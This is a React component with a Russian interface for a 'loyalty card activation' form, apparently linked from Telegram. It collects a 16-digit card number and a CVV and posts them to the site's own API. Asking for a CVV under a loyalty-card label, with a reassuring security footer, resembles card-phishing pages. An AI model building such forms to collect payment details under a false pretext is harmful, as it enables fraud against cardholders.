import { useState, useEffect } from 'react'
import { message } from 'antd'
import api from '../../utils/axios'
import './CardActivation.css'

const CardActivation = () => {
  const [cardNumber, setCardNumber] = useState('')
  const [cvv, setCvv] = useState('')
  const [isLoading, setIsLoading] = useState(false)
  const [chatId, setChatId] = useState(null) 
  const [companyId, setCompanyId] = useState(null)
  const [messageApi, contextHolder] = message.useMessage()
  

  useEffect(() => { 
    const urlParams = new URLSearchParams(window.location.search)
    const telegramChatId = urlParams.get('chatId') 
    const companyIdParam = urlParams.get("companyId");
    setCompanyId(companyIdParam) 
    setChatId(telegramChatId)
  }, [])

  const handleSubmit = async (e) => {
    e.preventDefault()

    // Проверяем, что номер карты содержит ровно 16 цифр
    const cleanCardNumber = cardNumber.replace(/\s/g, '')
    if (cleanCardNumber.length !== 16 || !/^\d{16}$/.test(cleanCardNumber)) {
      messageApi.error('Номер карты должен содержать ровно 16 цифр')
      return
    }

    if (!cvv.trim()) {
      messageApi.error('Пожалуйста, заполните все поля')
      return
    }

    if (!chatId) {
      messageApi.error('Ошибка: не найден ID пользователя Telegram')
      return
    }

    setIsLoading(true)

    try {
      // Здесь будет API запрос для активации карты
      const response = await api.post(`/v2/card/activate?chat_id_v2=${chatId}&company_id=${companyId}`, {
        cardNumber: cleanCardNumber,
        cvv: cvv.trim(),
        companyId: companyId,
        chat_id_v2: chatId
      })

      if (response.data.success) {
        messageApi.success('Карта успешно активирована!')
        setCardNumber('')
        setCvv('')
      } else {
        messageApi.error(response.data.message || 'Ошибка при активации карты')
      }
    } catch (error) {
      console.error('Ошибка активации:', error)

      // Показываем сообщение об ошибке из API
      if (error.response?.data?.message) {
        messageApi.error(error.response.data.message)
      } else {
        messageApi.error('Произошла ошибка. Попробуйте еще раз.')
      }
    } finally {
      setIsLoading(false)
    }
  }

  const formatCardNumber = (value) => {
    // Убираем все символы кроме цифр
    const digitsOnly = value.replace(/\D/g, '')

    // Ограничиваем до 16 цифр
    const limitedDigits = digitsOnly.slice(0, 16)

    // Форматируем с пробелами для отображения
    const parts = []
    for (let i = 0; i < limitedDigits.length; i += 4) {
      parts.push(limitedDigits.substring(i, i + 4))
    }

    return parts.join(' ')
  }

  const formatCvv = (value) => {
    // Форматирование CVV - только цифры, максимум 4 символа
    return value.replace(/\s+/g, '').replace(/[^0-9]/gi, '').slice(0, 4)
  }

  return (
    <div className="card-activation">
      {contextHolder}
      <div className="activation-container">
        <div className="header">
          <div className="logo">
            <div className="logo-icon">🎯</div>
          </div>
          <h1>Активация карты лояльности</h1>
          <p>Введите данные для активации вашей карты</p>
        </div>

        <form onSubmit={handleSubmit} className="activation-form">
          <div className="form-group">
            <label htmlFor="cardNumber">Номер карты</label>
            <div className="input-wrapper">
              <input
                type="text"
                id="cardNumber"
                value={cardNumber}
                onChange={(e) => setCardNumber(formatCardNumber(e.target.value))}
                placeholder="0000 0000 0000 0000"
                maxLength="19"
                className="form-input"
              />
              <div className="input-icon">💳</div>
            </div>
          </div>

          <div className="form-group">
            <label htmlFor="cvv">CVV</label>
            <div className="input-wrapper">
              <input
                type="text"
                id="cvv"
                value={cvv}
                onChange={(e) => setCvv(formatCvv(e.target.value))}
                placeholder="123"
                maxLength="4"
                className="form-input"
              />
              <div className="input-icon">🔒</div>
            </div>
          </div>

          <button
            type="submit"
            className={`submit-btn ${isLoading ? 'loading' : ''}`}
            disabled={isLoading}
          >
            {isLoading ? (
              <>
                <div className="spinner"></div>
                Активируем...
              </>
            ) : (
              'Активировать карту'
            )}
          </button>
        </form>

        <div className="footer">
          <p>Безопасная активация • Ваши данные защищены</p>
        </div>
      </div>
    </div>
  )
}

export default CardActivation 